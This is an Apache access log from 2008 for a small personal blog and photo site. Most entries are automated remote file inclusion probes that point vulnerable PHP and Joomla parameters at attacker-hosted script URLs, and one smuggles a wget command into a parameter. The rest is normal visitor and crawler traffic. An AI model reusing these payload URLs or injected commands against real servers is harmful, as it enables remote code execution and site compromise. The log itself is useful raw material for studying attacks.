66.6.223.160 - - [08/Jun/2008:09:20:18 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.810" "www.dmulk.com"
72.3.241.218 - - [08/Jun/2008:09:20:22 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 12516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "dmulk.com"
87.106.101.24 - - [08/Jun/2008:09:20:30 -0700] "GET /logs/index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:09:20:34 -0700] "GET /index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16852 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:20:48 -0700] "GET /logs/index.php?redir=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:20:50 -0700] "GET /index.php?redir=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 200 16832 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:21:29 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:21:32 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16936 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:21:33 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:21:50 -0700] "GET /logs/port.php?content=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:21:50 -0700] "GET /port.php?content=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.189.33 - - [08/Jun/2008:09:21:56 -0700] "GET /logs/access_080429.log/config/dbutil.bck.php?confdir=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:22:02 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.88.84 - - [08/Jun/2008:09:22:04 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [08/Jun/2008:09:22:04 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [08/Jun/2008:09:22:05 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:22:08 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.24 - - [08/Jun/2008:09:22:24 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:09:22:51 -0700] "GET /logs/access_080215.log/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.210.119.70 - - [08/Jun/2008:09:22:59 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 200 64790 "http://www.st-owners.com/forums/showthread.php?t=32353&page=6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:09:23:04 -0700] "GET /index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 200 16828 "-" "libwww-perl/5.805" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:09:23:15 -0700] "GET /logs/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.64.234 - - [08/Jun/2008:09:23:18 -0700] "GET /logs/access.log/errors.php?error=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.64.234 - - [08/Jun/2008:09:23:18 -0700] "GET /errors.php?error=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.64.234 - - [08/Jun/2008:09:23:18 -0700] "GET /logs/errors.php?error=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:23:26 -0700] "GET /logs/access_080121.log/send_reminders.php?includedir=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:23:26 -0700] "GET /send_reminders.php?includedir=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:23:26 -0700] "GET /logs/send_reminders.php?includedir=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:23:43 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:23:55 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:23:57 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:23:58 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:09:24:06 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:24:15 -0700] "GET /logs/access_080118.log/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:24:16 -0700] "GET /init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:24:16 -0700] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:24:20 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:24:20 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:24:21 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:24:21 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [08/Jun/2008:09:24:32 -0700] "GET /logs/access.log/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:09:24:43 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.26.18 - - [08/Jun/2008:09:25:04 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [08/Jun/2008:09:25:07 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [08/Jun/2008:09:25:08 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:25:29 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:09:26:11 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:09:26:14 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16850 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:26:50 -0700] "GET /logs/send_reminders.php?includedir=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:26:50 -0700] "GET /send_reminders.php?includedir=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:09:27:21 -0700] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.6.223.160 - - [08/Jun/2008:09:27:37 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.810" "www.dmulk.com"
81.3.11.60 - - [08/Jun/2008:09:27:43 -0700] "GET /logs/access_080312.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wellingtonindustries.com/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.11.60 - - [08/Jun/2008:09:27:44 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wellingtonindustries.com/t.txt??? HTTP/1.1" 200 16976 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.11.60 - - [08/Jun/2008:09:27:45 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://wellingtonindustries.com/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.182 - - [08/Jun/2008:09:28:03 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [08/Jun/2008:09:28:04 -0700] "GET /logs/access_080117.log//modules/Forums/errors.php?error=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:28:21 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:28:21 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:28:22 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:28:29 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:28:29 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:28:29 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.79 - - [08/Jun/2008:09:28:52 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/?show=gallery HTTP/1.1" 200 25017 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
65.55.213.30 - - [08/Jun/2008:09:28:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [08/Jun/2008:09:28:57 -0700] "GET /minamijewelry/html/index.html HTTP/1.0" 200 13287 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:28:58 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:28:58 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:28:58 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [08/Jun/2008:09:29:01 -0700] "GET /logs/access_080426.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:29:04 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:29:06 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16920 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:29:07 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.141.226.76 - - [08/Jun/2008:09:29:15 -0700] "GET /logs/access_071230.log/inde.php?lang=http://stampthai.rmemo.org/ec.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
125.141.226.76 - - [08/Jun/2008:09:29:15 -0700] "GET /inde.php?lang=http://stampthai.rmemo.org/ec.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
125.141.226.76 - - [08/Jun/2008:09:29:16 -0700] "GET /logs/inde.php?lang=http://stampthai.rmemo.org/ec.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.83.63.50 - - [08/Jun/2008:09:29:19 -0700] "GET /logs/access_080115.log/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.63.50 - - [08/Jun/2008:09:29:20 -0700] "GET /errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.63.50 - - [08/Jun/2008:09:29:20 -0700] "GET /logs/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.63.50 - - [08/Jun/2008:09:29:25 -0700] "GET /logs/access_071223.log/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:29:37 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:29:42 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:09:29:45 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:29:52 -0700] "GET /dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:29:53 -0700] "GET /logs/dmse/count/full.php//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:30:08 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:30:08 -0700] "GET //components/com_calendar.php?absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:30:08 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
130.242.82.146 - - [08/Jun/2008:09:30:09 -0700] "GET /phphtml.php?htmlclass_path=http://www.it-history.net/cgi/idscan3?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:30:16 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:21 -0700] "GET / HTTP/1.1" 200 16686 "http://www.st-owners.com/forums/showthread.php?t=42208" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:22 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:22 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:22 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:22 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:22 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:23 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:23 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:23 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:23 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:24 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:24 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:25 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:25 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:25 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:26 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:27 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:28 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&971 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:29 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&559 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:30 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:30 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:30:33 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0162.jpg HTTP/1.1" 200 355966 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "dmulk.com"
